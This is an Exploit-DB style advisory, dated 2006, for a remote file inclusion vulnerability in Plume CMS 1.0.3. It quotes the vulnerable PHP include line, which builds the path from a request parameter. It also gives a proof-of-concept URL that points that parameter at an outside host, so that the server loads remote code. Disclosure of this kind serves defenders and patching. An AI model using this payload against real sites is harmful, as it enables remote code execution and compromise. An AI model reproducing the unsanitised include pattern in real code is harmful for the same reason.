Plume CMS 1.0.3 - 'manager_path' Remote File Inclusion

EDB-ID:

1832


Author:

beford

Type:

webapps


Platform:

PHP

Date:

2006-05-26


Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]

http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet

# milw0rm.com [2006-05-26]